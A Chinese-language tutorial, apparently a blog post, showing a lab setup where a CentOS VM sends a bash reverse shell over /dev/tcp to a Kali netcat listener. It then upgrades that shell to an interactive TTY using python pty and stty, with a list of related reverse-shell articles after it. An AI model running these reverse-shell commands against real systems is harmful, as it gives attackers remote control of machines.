实验环境:

A : kali 虚拟机

B: centos7.5 虚拟机

1. A 机 kali 虚拟机 设置监听 端口

root@kali64:~# nc -lvvp 9001

# 端口随便定义,没被使用就行

2. B机 执行命令反弹shell

[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1

# ip地址为 kali 虚拟机的ip地址,端口为kali虚拟机监听的端口 主机ip和端口之间为`/`

补充:

标准输入 (stdin) :代码为 0

标准输出 (stdout):代码为 1

标准错误 (stderr):代码为 2

> 为重定向符号 , & 没有固定的意思

&> ,>&理解成一个整体

&>file # 将 标准输出 和 标准错误输出 都重定向到文件file中

>& # 将标准输出和标准错误输出重定向到文件/dev/tcp/,即传递到远程

2>&1 # 将标准错误重定向到标准输出中

0>&1 # 将标准输入重定向到标准输出中

反弹后再kali机上面查看,可以输入命令,不支持tab键,清屏等功能,需要升级成交互式shell

3.升级交互式shell

# 以下命令都是在kali 机上面操作

[root@localhost ~]# python -c 'import pty; pty.spawn("/bin/bash")' #使用python

[root@localhost ~]# ^Z # ctrl + z 按键 挂起正在运行的程序

root@kali64:~# stty raw -echo # 输入这句后 在输入命令终端不在显示

root@kali64:~# fg # 把后台挂起的程序,放到控制台----》 终端不显示命令,输入后回车

[root@localhost ~]# reset

[root@localhost ~]# export SHELL=bash

退回到kali机

# 以下命令都在kali机上面操作

[root@localhost ~]# exit # 退出终端

[root@localhost ~]# exit # 看前面主机名和用户来区分,继续退出,

root@kali64:~#

# 看到主机名变为kali说明回到kali机上面了------ 此时输入命令是不显示的

root@kali64:~# reset # 将终端恢复至原始状态

补充:

stty -echo # 禁止回显,当在键盘上输入时,并不出现在屏幕上

stty echo # 打开回显

stty raw # 设置原始输入

stty -raw # 关闭原始输入

bg # 将一个在后台暂停的命令,变成继续执行

fg # 将后台中的命令调至前台继续运行

jobs # 查看当前有多少在后台运行的命令

ctrl + z # 可以将一个正在前台执行的命令放到后台,并且暂停

clear # 清屏,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。

reset # 将终端恢复至原始状态,之前的终端输入操作信息将都会被清空

mysql 反弹shell_反弹shell升级成交互式shell相关推荐

  1. 交互式shell和非交互式shell、登录shell和非登录shell

    交互式shell和非交互式shell.登录shell和非登录shell: 我们在图形交互界面操作时,是交互式的,先理解交互式下的登陆和非登录概念: 概念 举例 特点 登陆shell 用户登陆时,输入用 ...

  2. 反弹Shell升级为交互式Shel

    前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给ka ...

  3. python反弹shell_反弹shell的各种姿势

    在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...

  4. python反弹shell_反弹Shell小结

    1.NC反弹shell 1.1.正向反弹shell 服务器 nc -lvvp 7777 -e /bin/bash 攻击机 nc  server-ip 7777 1.2.反向反弹shell 攻击机 nc ...

  5. python反弹shell_反弹shell的几种方式总结

    假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...

  6. python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell

    python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw - ...

  7. linux 非登录shell自动,Linux登录shell和非登录(交互式shell)环境变量配置

    使用Jenkins执行shell脚本的时候, 碰到command not found. 比如java mvn, 这些环境变量配置在/etc/profile 中, 但jenkins执行的时候并没有加载. ...

  8. php 与shell,[转]PHP与Shell交互

    From : http://blog.csdn.net/houqd2012/article/details/8219199 最近想使用PHP与Sheel进行交互.PHP控制显示和高层的逻辑结构.She ...

  9. shell从入门到精通(25)你知道什么是login shell和non login shell吗

    bash有几种不同的运行模式,login shell与non-login shell,interactive shell与non-interactive shell(比如执行shell脚本).这两种分 ...

最新文章

  1. python编码读法-python读音
  2. 面试的时候的要注意的case应该怎么分析
  3. 2017年10月05日普及组 负进制
  4. [.NET] : 设定Windows Service启动类型
  5. 关于概率性事件的产品性能和客户体验讨论
  6. 数据结构11——KMP
  7. 各代iphone尺寸_iphone屏幕尺寸比例是多少,iphone各代屏幕尺寸大小介绍
  8. led灯条串联图_10个LED灯并联再串联
  9. 常用坐标系介绍及转换方式
  10. 如何获取支付宝应用APPID
  11. 手机屏幕 高宽有哪些_苹果手机屏幕有哪些尺寸?
  12. java string newline,Java BufferedWriter newLine()用法及代码示例
  13. wps透视表列总计移到顶部_数据透视表总计中的错误
  14. 计算几何及其应用——计算几何基础
  15. matlab从mp4文件中提取音频,怎么提取MP4视频中的音频,将MP4格式转换为MP3格式
  16. 哪些在职人员可以考一级消防工程师
  17. Android Transtion
  18. 如何用pdf转jpg软件将pdf转换成图片
  19. android自定义手势,Android编程实现自定义手势的方法详解
  20. 因0x764fb11c的错误状态_Windows10有时无法快速启动,错误状态为 0xC00000D4。

热门文章

  1. SGU 460. Plural Form of Nouns
  2. Lniux系列 | Debian To Go 便携U盘系统 VM版 保姆级教程(win同理)
  3. C 语言实现 - 判断奇数/偶数
  4. Jetson Xavier NX 套件
  5. 云端来兔 新岁纳福 | 点击查收您的限定新年礼
  6. 一个简单的Android计步器
  7. 微信 服务器配置 token认证失败
  8. 3518. 进化序列(evolve)
  9. source insight 序列号
  10. [奥运] 冠军的付出与回报